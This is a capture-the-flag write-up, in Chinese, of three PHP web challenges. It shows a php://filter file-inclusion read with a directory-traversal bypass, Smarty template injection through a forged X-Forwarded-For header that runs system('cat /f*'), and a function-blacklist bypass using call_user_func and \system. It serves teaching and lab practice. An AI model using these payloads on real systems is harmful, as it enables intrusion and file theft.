目录
[BSidesCF 2020]Had a bad day
打开网站有两个按钮 , 随便按一个
可以看到
尝试随便输入一个参数, 发现报错有个 include() , 估计就是文件包含了
?category=pHp://FilTer/convert.base64-encode/resource=index.php
尝试读一下当前文件, 依旧报错 ,有点奇怪
将后缀去掉再试试
?category=pHp://FilTer/convert.base64-encode/resource=index
可以读出文件
截取php的代码
<?php
$file = $_GET['category'];if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
确实是不需要 后缀.php
读取的文件要匹配到 woofers 或者 meowers 或者 index
利用目录穿越去绕过
?category=pHp://FilTer/convert.base64-encode/resource=index/../flag
可以读到flag
[BJDCTF2020]The mystery of ip
点击一下flag , 会先出ip
查看提示:
X-Forwarded-For:
用来表示 HTTP 请求端真实 IP
抓个包看看尝试伪造一下ip, 有没有什么变化
所以问题就是这里了, 看看再这里执行一下命令
想到ssti的那种格式尝试一下
但并不是ssti
根据报错, 搜索一下可以发现是Smarty 模板
使用{if}{/if}标签执行命令
{if system("cat /f*")}{/if}
[网鼎杯 2020 朱雀组]phpweb
好像没啥东西, 抓个包看看
会有两个包
会有两个参数
一个 func 估计就是传入函数的
一个 p 估计就是参数
尝试一下system 被过滤了
读取一下当前的文件看看
过滤了很多函数
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>
可以利用那个类进行反序列化
emmmm, 没找到flag
看一下环境里面, 也没有flag
system(“find / -name flag*”)
查找有 flag名字的文件
直接读取找到的文件
cat $(find / -name flag*)
好像也可以 使用 \system 来绕过 (但我尝试的时候没成功, 没有回显)
func=\system&p=cat /tmp/flagoefiu4r93